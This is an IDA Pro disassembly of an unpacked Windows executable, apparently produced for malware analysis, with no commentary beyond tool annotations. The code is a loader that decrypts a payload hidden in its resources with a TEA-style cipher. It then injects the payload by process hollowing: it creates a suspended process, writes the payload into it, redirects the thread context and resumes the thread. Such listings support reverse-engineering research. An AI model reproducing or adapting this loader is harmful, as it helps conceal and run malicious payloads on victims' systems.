;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 58D9C7F2829E1B96B04A99442D6A48E4
; File Name : u:\work\58d9c7f2829e1b96b04a99442d6a48e4_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 00000B5E ( 2910.)
; Section size in file : 00000C00 ( 3072.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 10001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; [0000004B BYTES: COLLAPSED FUNCTION _pre_cpp_init. PRESS KEYPAD "+" TO EXPAND]
; [000001DF BYTES: COLLAPSED FUNCTION ___tmainCRTStartup. PRESS KEYPAD "+" TO EXPAND]
; [000000E2 BYTES: COLLAPSED FUNCTION $LN54. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _amsg_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000096 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN8. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_100013CD proc near ; CODE XREF: $LN54+A9�p
push esi
push edi
mov eax, offset dword_10002188
mov edi, offset dword_10002188
cmp eax, edi
mov esi, eax
jnb short loc_100013EE
loc_100013DF: ; CODE XREF: sub_100013CD+1F�j
mov eax, [esi]
test eax, eax
jz short loc_100013E7
call eax
loc_100013E7: ; CODE XREF: sub_100013CD+16�j
add esi, 4
cmp esi, edi
jb short loc_100013DF
loc_100013EE: ; CODE XREF: sub_100013CD+10�j
pop edi
pop esi
retn
sub_100013CD endp
; =============== S U B R O U T I N E =======================================
; void __cdecl sub_100013F1()
sub_100013F1 proc near ; DATA XREF: _pre_cpp_init�o
push esi
push edi
mov eax, offset dword_10002190
mov edi, offset dword_10002190
cmp eax, edi
mov esi, eax
jnb short loc_10001412
loc_10001403: ; CODE XREF: sub_100013F1+1F�j
mov eax, [esi]
test eax, eax
jz short loc_1000140B
call eax
loc_1000140B: ; CODE XREF: sub_100013F1+16�j
add esi, 4
cmp esi, edi
jb short loc_10001403
loc_10001412: ; CODE XREF: sub_100013F1+10�j
pop edi
pop esi
retn
sub_100013F1 endp
; ---------------------------------------------------------------------------
align 2
; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __ValidateImageBase. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000042 BYTES: COLLAPSED FUNCTION __FindPESection. PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION __IsNonwritableInCurrentImage. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _initterm_e. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __except_handler4. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_100015B1 proc near ; CODE XREF: $LN54+AE�p
; DATA XREF: $LN54+BC�o
xor eax, eax
retn
sub_100015B1 endp
; [00000094 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _unlock. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION __dllonexit. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _lock. PRESS KEYPAD "+" TO EXPAND]
word_1000165A dw 0D3Bh ; DATA XREF: __except_handler4+10�o
dd offset dword_10003010
dd 0C3F30275h, 13E9h
db 0, 0CCh
; [00000006 BYTES: COLLAPSED FUNCTION _except_handler4_common. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _invoke_watson. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _controlfp_s. PRESS KEYPAD "+" TO EXPAND]
; [00000104 BYTES: COLLAPSED FUNCTION ___report_gsfailure. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _crt_debugger_hook. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_10001786 proc near ; CODE XREF: sub_10001813+42�p
; sub_10001813+64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_10001799
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_10001799: ; CODE XREF: sub_10001786+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_10001786 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100017A0 proc near ; CODE XREF: sub_10001A08+21�p
; sub_10001A08+3F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [edx]
mov eax, [edx+4]
push ebx
push esi
mov [ebp+var_4], 0C6EF3720h
mov [ebp+var_8], 20h
push edi
loc_100017BB: ; CODE XREF: sub_100017A0+67�j
mov ebx, [ebp+arg_0]
mov esi, ecx
shr esi, 5
mov edi, ecx
shl edi, 4
xor esi, edi
mov edi, [ebp+var_4]
shr edi, 0Bh
and edi, 3
mov edi, [ebx+edi*4]
add edi, [ebp+var_4]
add [ebp+var_4], 61C88647h
add esi, ecx
xor esi, edi
sub eax, esi
mov esi, eax
shr esi, 5
mov edi, eax
shl edi, 4
xor esi, edi
mov edi, [ebp+var_4]
and edi, 3
mov edi, [ebx+edi*4]
add edi, [ebp+var_4]
add esi, eax
xor esi, edi
sub ecx, esi
dec [ebp+var_8]
jnz short loc_100017BB
pop edi
pop esi
mov [edx], ecx
mov [edx+4], eax
pop ebx
leave
retn
sub_100017A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10001813(void *Src,LPSTR lpCommandLine)
sub_10001813 proc near ; CODE XREF: WinMain(x,x,x,x)+35�p
Context = CONTEXT ptr -334h
Dst = byte ptr -68h
hThread = _PROCESS_INFORMATION ptr -24h
var_14 = dword ptr -14h
NumberOfBytesWritten= dword ptr -10h
Memory = dword ptr -0Ch
var_8 = dword ptr -8
dwSize = dword ptr -4
Src = dword ptr 8
lpCommandLine = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 334h
mov eax, [ebp+Src]
and [ebp+NumberOfBytesWritten], 0
push esi
mov esi, [eax+3Ch]
add esi, eax
cmp word ptr [eax], 5A4Dh
movzx ecx, word ptr [esi+14h]
lea ecx, [ecx+esi+18h]
mov [ebp+var_14], ecx
jnz loc_10001A05
cmp dword ptr [esi], 4550h
jnz loc_10001A05
push ebx
mov ebx, [esi+54h]
push edi
mov edi, [esi+38h]
push edi
push ebx
call sub_10001786
mov [ebp+dwSize], eax
movzx eax, word ptr [esi+6]
add esp, 8
test eax, eax
jle short loc_10001892
add ecx, 14h
mov [ebp+var_8], eax
loc_1000186E: ; CODE XREF: sub_10001813+7D�j
mov eax, [ecx-0Ch]
test eax, eax
jz short loc_10001882
push edi
push eax
call sub_10001786
add esp, 8
add [ebp+dwSize], eax
loc_10001882: ; CODE XREF: sub_10001813+60�j
mov eax, [ecx]
cmp eax, ebx
jnb short loc_1000188A
mov ebx, eax
loc_1000188A: ; CODE XREF: sub_10001813+73�j
add ecx, 28h
dec [ebp+var_8]
jnz short loc_1000186E
loc_10001892: ; CODE XREF: sub_10001813+53�j
push [ebp+dwSize] ; Size
call ds:malloc ; malloc
mov edi, eax
test edi, edi
pop ecx
mov [ebp+Memory], edi
jz loc_10001A03
push [ebp+dwSize] ; Size
push 0 ; Val
push edi ; Dst
call memset ; memset
push ebx ; Size
push [ebp+Src] ; Src
push edi ; Dst
call memcpy ; memcpy
mov ecx, [esi+38h]
push ecx
push dword ptr [esi+54h]
call sub_10001786
mov ebx, eax
add ebx, edi
xor edi, edi
add esp, 20h
cmp [esi+6], di
mov [ebp+var_8], edi
jbe short loc_10001934
mov edi, [ebp+var_14]
add edi, 8
loc_100018E2: ; CODE XREF: sub_10001813+11D�j
mov eax, [edi+8]
test eax, eax
jbe short loc_10001911
mov ecx, eax
mov eax, [edi]
cmp ecx, eax
jbe short loc_100018F3
mov ecx, eax
loc_100018F3: ; CODE XREF: sub_10001813+DC�j
mov eax, [edi+0Ch]
add eax, [ebp+Src]
push ecx ; Size
push eax ; Src
push ebx ; Dst
call memcpy ; memcpy
mov ecx, [esi+38h]
push ecx
push dword ptr [edi]
call sub_10001786
add esp, 14h
jmp short loc_10001921
; ---------------------------------------------------------------------------
loc_10001911: ; CODE XREF: sub_10001813+D4�j
mov eax, [edi]
test eax, eax
jz short loc_10001923
push ecx
push eax
call sub_10001786
add esp, 8
loc_10001921: ; CODE XREF: sub_10001813+FC�j
add ebx, eax
loc_10001923: ; CODE XREF: sub_10001813+102�j
movzx eax, word ptr [esi+6]
inc [ebp+var_8]
add edi, 28h
cmp [ebp+var_8], eax
jl short loc_100018E2
xor edi, edi
loc_10001934: ; CODE XREF: sub_10001813+C7�j
push 44h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call memset ; memset
push 2CCh ; Size
lea eax, [ebp+Context]
push edi ; Val
push eax ; Dst
call memset ; memset
add esp, 18h
lea eax, [ebp+hThread]
push eax ; lpProcessInformation
lea eax, [ebp+Dst]
push eax ; lpStartupInfo
push edi ; lpCurrentDirectory
push edi ; lpEnvironment
push 4 ; dwCreationFlags
push edi ; bInheritHandles
push edi ; lpThreadAttributes
push edi ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
push edi ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz loc_10001A03
lea eax, [ebp+Context]
push eax ; lpContext
push [ebp+hThread.hThread] ; hThread
mov [ebp+Context.ContextFlags], 10007h
call ds:GetThreadContext ; GetThreadContext
push 40h ; flProtect
push 3000h ; flAllocationType
push [ebp+dwSize] ; dwSize
lea edi, [esi+34h]
push dword ptr [edi] ; lpAddress
push [ebp+hThread.hProcess] ; hProcess
call ds:VirtualAllocEx ; VirtualAllocEx
mov ebx, ds:WriteProcessMemory
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push [ebp+dwSize] ; nSize
push [ebp+Memory] ; lpBuffer
push dword ptr [edi] ; lpBaseAddress
push [ebp+hThread.hProcess] ; hProcess
call ebx ; WriteProcessMemory
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov eax, [ebp+Context._Ebx]
push 4 ; nSize
push edi ; lpBuffer
add eax, 8
push eax ; lpBaseAddress
push [ebp+hThread.hProcess] ; hProcess
call ebx ; WriteProcessMemory
mov eax, [esi+28h]
add eax, [edi]
mov [ebp+Context._Eax], eax
lea eax, [ebp+Context]
push eax ; lpContext
push [ebp+hThread.hThread] ; hThread
call ds:SetThreadContext ; SetThreadContext
push [ebp+hThread.hThread] ; hThread
call ds:ResumeThread ; ResumeThread
push [ebp+Memory] ; Memory
call ds:free ; free
pop ecx
loc_10001A03: ; CODE XREF: sub_10001813+90�j
; sub_10001813+15D�j
pop edi
pop ebx
loc_10001A05: ; CODE XREF: sub_10001813+26�j
; sub_10001813+32�j
pop esi
leave
retn
sub_10001813 endp
; =============== S U B R O U T I N E =======================================
sub_10001A08 proc near ; CODE XREF: sub_10001A5F+77�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
test al, 7
jz short loc_10001A0F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_10001A0F: ; CODE XREF: sub_10001A08+2�j
shr eax, 2
dec eax
dec eax
jz short loc_10001A41
push ebx
lea ebx, [eax-1]
shr ebx, 1
push esi
lea esi, [edi+eax*4+4]
inc ebx
loc_10001A22: ; CODE XREF: sub_10001A08+35�j
push [esp+8+arg_0]
lea edx, [esi-4]
call sub_100017A0
mov eax, [esi-0Ch]
xor [edx], eax
mov eax, [esi-8]
xor [esi], eax
sub esi, 8
dec ebx
pop ecx
jnz short loc_10001A22
pop esi
pop ebx
loc_10001A41: ; CODE XREF: sub_10001A08+C�j
push [esp+arg_0]
mov edx, edi
call sub_100017A0
mov eax, [esp+4+arg_4]
pop ecx
mov ecx, [eax]
xor [edi], ecx
mov eax, [eax+4]
xor [edi+4], eax
xor eax, eax
inc eax
retn
sub_10001A08 endp
; =============== S U B R O U T I N E =======================================
sub_10001A5F proc near ; CODE XREF: WinMain(x,x,x,x)+A�p
push ebx
mov ebx, ds:FindResourceA
push offset Type ; "DSCRAMBLEDATA"
push offset Name ; "SCRAMBLEINFO"
push 0 ; hModule
call ebx ; FindResourceA
test eax, eax
jnz short loc_10001A7A
pop ebx
retn
; ---------------------------------------------------------------------------
loc_10001A7A: ; CODE XREF: sub_10001A5F+17�j
push ebp
mov ebp, ds:LoadResource
push eax ; hResInfo
push 0 ; hModule
call ebp ; LoadResource
test eax, eax
jz short loc_10001B04
push esi
push edi
mov edi, ds:LockResource
push eax ; hResData
call edi ; LockResource
mov esi, eax
test esi, esi
jz short loc_10001AF0
push offset Type ; "DSCRAMBLEDATA"
push offset aScrambledata ; "SCRAMBLEDATA"
push 0 ; hModule
call ebx ; FindResourceA
mov ebx, eax
test ebx, ebx
jz short loc_10001AF0
push ebx ; hResInfo
push 0 ; hModule
call ebp ; LoadResource
test eax, eax
jz short loc_10001AF0
push eax ; hResData
call edi ; LockResource
mov edi, eax
test edi, edi
jz short loc_10001AF0
push ebx ; hResInfo
push 0 ; hModule
call ds:SizeofResource ; SizeofResource
test eax, eax
jz short loc_10001AF0
lea ecx, [esi+14h]
push ecx
lea ecx, [esi+4]
push ecx
call sub_10001A08
test eax, eax
pop ecx
pop ecx
jz short loc_10001AF0
push dword ptr [esi] ; Size
call ds:malloc ; malloc
mov ebx, eax
test ebx, ebx
pop ecx
jnz short loc_10001AF4
loc_10001AF0: ; CODE XREF: sub_10001A5F+3A�j
; sub_10001A5F+4E�j ...
xor eax, eax
jmp short loc_10001B02
; ---------------------------------------------------------------------------
loc_10001AF4: ; CODE XREF: sub_10001A5F+8F�j
push dword ptr [esi] ; Size
push edi ; Src
push ebx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, ebx
loc_10001B02: ; CODE XREF: sub_10001A5F+93�j
pop edi
pop esi
loc_10001B04: ; CODE XREF: sub_10001A5F+29�j
pop ebp
pop ebx
retn
sub_10001A5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: ___tmainCRTStartup+13B�p
CommandLine = byte ptr -104h
hModule = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push esi
call sub_10001A5F
mov esi, eax
test esi, esi
jnz short loc_10001B1F
inc eax
jmp short loc_10001B4D
; ---------------------------------------------------------------------------
loc_10001B1F: ; CODE XREF: WinMain(x,x,x,x)+13�j
push 104h ; nSize
lea eax, [ebp+CommandLine]
push eax ; lpFilename
push [ebp+hModule] ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+CommandLine]
push eax ; lpCommandLine
push esi ; Src
call sub_10001813
push esi ; Memory
call ds:free ; free
add esp, 0Ch
xor eax, eax
loc_10001B4D: ; CODE XREF: WinMain(x,x,x,x)+16�j
pop esi
leave
retn 10h
_WinMain@16 endp
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
align 100h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000006DC ( 1756.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00001000
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall GetThreadContext(HANDLE hThread,LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_10001813+177�p
; DATA XREF: sub_10001813+177�r
; HRSRC __stdcall FindResourceA(HMODULE hModule,LPCSTR lpName,LPCSTR lpType)
extrn FindResourceA:dword ; CODE XREF: sub_10001A5F+13�p
; sub_10001A5F+48�p
; DATA XREF: ...
; BOOL __stdcall SetThreadContext(HANDLE hThread,const CONTEXT *lpContext)
extrn SetThreadContext:dword ; CODE XREF: sub_10001813+1D7�p
; DATA XREF: sub_10001813+1D7�r
; HGLOBAL __stdcall LoadResource(HMODULE hModule,HRSRC hResInfo)
extrn LoadResource:dword ; CODE XREF: sub_10001A5F+25�p
; sub_10001A5F+53�p
; DATA XREF: ...
; DWORD __stdcall SizeofResource(HMODULE hModule,HRSRC hResInfo)
extrn SizeofResource:dword ; CODE XREF: sub_10001A5F+65�p
; DATA XREF: sub_10001A5F+65�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_10001813+155�p
; DATA XREF: sub_10001813+155�r
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_10001813+18F�p
; DATA XREF: sub_10001813+18F�r
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn LockResource:dword ; CODE XREF: sub_10001A5F+34�p
; sub_10001A5F+5A�p
; DATA XREF: ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: WinMain(x,x,x,x)+27�p
; DATA XREF: WinMain(x,x,x,x)+27�r
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess,LPVOID lpBaseAddress,LPCVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesWritten)
extrn WriteProcessMemory:dword ; CODE XREF: sub_10001813+1AA�p
; sub_10001813+1C0�p
; DATA XREF: ...
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_10001813+1E0�p
; DATA XREF: sub_10001813+1E0�r
; LPTOP_LEVEL_EXCEPTION_FILTER __stdcall SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
extrn SetUnhandledExceptionFilter:dword ; CODE XREF: ___report_gsfailure+CE�p
; DATA XREF: ___report_gsfailure+CE�r
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: ___report_gsfailure+D9�p
; DATA XREF: ___report_gsfailure+D9�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: ___report_gsfailure+F5�p
; DATA XREF: ___report_gsfailure+F5�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: ___report_gsfailure+FC�p
; DATA XREF: ___report_gsfailure+FC�r
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: ___security_init_cookie+35�p
; DATA XREF: ___security_init_cookie+35�r
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: ___security_init_cookie+41�p
; DATA XREF: ___security_init_cookie+41�r
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: ___security_init_cookie+49�p
; DATA XREF: ___security_init_cookie+49�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: ___security_init_cookie+51�p
; DATA XREF: ___security_init_cookie+51�r
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: ___security_init_cookie+5D�p
; DATA XREF: ___security_init_cookie+5D�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: ___tmainCRTStartup+18�p
; DATA XREF: ___tmainCRTStartup+18�r
; LONG __stdcall InterlockedCompareExchange(volatile LONG *Destination,LONG Exchange,LONG Comperand)
extrn InterlockedCompareExchange:dword ; CODE XREF: ___tmainCRTStartup+3E�p
; DATA XREF: ___tmainCRTStartup+3E�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: ___tmainCRTStartup+58�p
; DATA XREF: ___tmainCRTStartup+58�r
; LONG __stdcall InterlockedExchange(volatile LONG *Target,LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: ___tmainCRTStartup+CF�p
; DATA XREF: ___tmainCRTStartup+CF�r
; BOOL __stdcall IsDebuggerPresent()
extrn IsDebuggerPresent:dword ; CODE XREF: ___report_gsfailure+B9�p
; DATA XREF: ___report_gsfailure+B9�r
;
; Imports from MSVCR80.dll
;
extrn _adjust_fdiv:dword ; DATA XREF: $LN54+9D�r
extrn __setusermatherr:dword ; CODE XREF: $LN54+C1�p
; DATA XREF: $LN54+C1�r
extrn __p__fmode:dword ; CODE XREF: $LN54+81�p
; DATA XREF: $LN54+81�r
extrn _encode_pointer:dword ; CODE XREF: $LN54+6F�p
; __onexit+6D�p ...
extrn __set_app_type:dword ; CODE XREF: $LN54+67�p
; DATA XREF: $LN54+67�r
extrn __imp__unlock:dword ; DATA XREF: _unlock�r
extrn __imp___dllonexit:dword ; DATA XREF: __dllonexit�r
extrn __imp__lock:dword ; DATA XREF: _lock�r
; _onexit_t __cdecl onexit(_onexit_t Func)
extrn _onexit:dword ; CODE XREF: __onexit+26�p
; DATA XREF: __onexit+26�r
extrn _decode_pointer:dword ; CODE XREF: __onexit+18�p
; __onexit+41�p ...
extrn __imp__except_handler4_common:dword
; DATA XREF: _except_handler4_common�r
extrn __imp__invoke_watson:dword ; DATA XREF: _invoke_watson�r
; errno_t __cdecl _controlfp_s(unsigned int *CurrentState,unsigned int NewValue,unsigned int Mask)
extrn __imp__controlfp_s:dword ; DATA XREF: _controlfp_s�r
extrn __imp__crt_debugger_hook:dword ; DATA XREF: _crt_debugger_hook�r
extrn _configthreadlocale:dword ; CODE XREF: $LN54+D8�p
; DATA XREF: $LN54+D8�r
extrn __imp__initterm_e:dword ; DATA XREF: _initterm_e�r
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
extrn _acmdln:dword ; DATA XREF: ___tmainCRTStartup:loc_10001144�r
; void __cdecl exit(int Code)
extrn exit:dword ; CODE XREF: ___tmainCRTStartup+14F�p
; DATA XREF: ___tmainCRTStartup+14F�r
; int __cdecl ismbblead(unsigned int)
extrn _ismbblead:dword ; CODE XREF: ___tmainCRTStartup+168�p
; DATA XREF: ___tmainCRTStartup+168�r
extrn __imp__XcptFilter:dword ; DATA XREF: _XcptFilter�r
; void __cdecl exit(int Code)
extrn _exit:dword ; CODE XREF: ___tmainCRTStartup+1A3�p
; DATA XREF: ___tmainCRTStartup+1A3�r
; void cexit(void)
extrn _cexit:dword ; CODE XREF: ___tmainCRTStartup+1B2�p
; DATA XREF: ___tmainCRTStartup+1B2�r
extrn __getmainargs:dword ; CODE XREF: _pre_cpp_init+30�p
; DATA XREF: _pre_cpp_init+30�r
extrn __imp__amsg_exit:dword ; DATA XREF: _amsg_exit�r
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_10001813+82�p
; sub_10001A5F+84�p
; DATA XREF: ...
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_10001813+1E9�p
; WinMain(x,x,x,x)+3B�p
; DATA XREF: ...
extrn __p__commode:dword ; CODE XREF: $LN54+8F�p
; DATA XREF: $LN54+8F�r
; void *__cdecl memcpy(void *Dst,const void *Src,size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; void *__cdecl memset(void *Dst,int Val,size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 100020E4h
dword_100020E4 dd 0 ; DATA XREF: ___tmainCRTStartup+B3�o
dd offset _pre_cpp_init
dword_100020EC dd 0 ; DATA XREF: ___tmainCRTStartup+AE�o
dword_100020F0 dd 0 ; DATA XREF: ___tmainCRTStartup+8A�o
dd offset $LN54 ; _pre_c_init
dword_100020F8 dd 2 dup(0) ; DATA XREF: ___tmainCRTStartup+85�o
; struct _EXCEPTION_POINTERS ExceptionInfo
ExceptionInfo _EXCEPTION_POINTERS <offset dword_10003048, offset dword_100030A0>
; DATA XREF: ___report_gsfailure+D4�o
; char Type[]
Type db 'DSCRAMBLEDATA',0 ; DATA XREF: sub_10001A5F+7�o
; sub_10001A5F+3C�o
align 4
; char Name[]
Name db 'SCRAMBLEINFO',0 ; DATA XREF: sub_10001A5F+C�o
align 4
; char aScrambledata[]
aScrambledata db 'SCRAMBLEDATA',0 ; DATA XREF: sub_10001A5F+41�o
align 4
unicode 0, <H>,0
dd 0Eh dup(0)
dd offset dword_10003010
dd offset dword_10002180
dd 1
dword_10002180 dd 1565h, 0 ; DATA XREF: .rdata:10002178�o
dword_10002188 dd 2 dup(0) ; DATA XREF: sub_100013CD+2�o
; sub_100013CD+7�o
dword_10002190 dd 2 dup(0) ; DATA XREF: sub_100013F1+2�o
; sub_100013F1+7�o
dword_10002198 dd 0FFFFFFFEh, 0 ; DATA XREF: ___tmainCRTStartup+2�o
dd 0FFFFFF88h, 0
dd 0FFFFFFFEh, 10001211h, 10001215h, 0FFFFFFFEh, 100011C5h
dd 100011D9h
dword_100021C0 dd 0FFFFFFFEh, 0 ; DATA XREF: __onexit+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset $LN8
align 10h
dword_100021E0 dd 0FFFFFFFEh, 0 ; DATA XREF: __IsNonwritableInCurrentImage+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 100014D8h, 100014ECh, 2238h, 2 dup(0)
dd 23E6h, 2000h, 22A0h, 2 dup(0)
dd 2406h, 2068h, 5 dup(0)
dd 231Ch, 2330h, 2340h, 2354h, 2364h, 2376h, 2388h, 239Ah
dd 23AAh, 23C0h, 23D6h, 2696h, 267Ah, 2666h, 2652h, 2638h
dd 2622h, 260Ch, 25FCh, 25E2h, 25D0h, 25B2h, 25AAh, 2594h
dd 26B4h, 0
dd 24B4h, 24A0h, 24D4h, 24E2h, 24F4h, 2506h, 2510h, 251Eh
dd 2526h, 2530h, 2542h, 255Ch, 256Eh, 257Eh, 248Ah, 247Ch
dd 2470h, 2466h, 245Eh, 2450h, 2442h, 243Ah, 2430h, 2420h
dd 2412h, 23FCh, 23F4h, 24C4h, 26C8h, 26D2h, 0
dd 654701D7h, 72685474h, 43646165h, 65746E6Fh, 7478h, 694600E3h
dd 6552646Eh, 72756F73h, 416563h, 65530340h, 72685474h
dd 43646165h, 65746E6Fh, 7478h, 6F4C0257h, 65526461h, 72756F73h
dd 6563h, 69530355h, 666F657Ah, 6F736552h, 65637275h, 660000h
dd 61657243h, 72506574h, 7365636Fh, 4173h, 69560382h, 61757472h
dd 6C6C416Ch, 7845636Fh, 2650000h, 6B636F4Ch, 6F736552h
dd 65637275h, 17D0000h
aGetmodulefilen db 'GetModuleFileNameA',0
align 10h
db 0ADh ;
db 3, 57h, 72h
aIteprocessmemo db 'iteProcessMemory',0
align 2
dw 2D2h
aResumethread db 'ResumeThread',0
align 2
aKernel32_dll db 'KERNEL32.dll',0
align 4
dd 726604EDh, 6565h, 616D0524h, 636F6C6Ch, 534D0000h, 38524356h
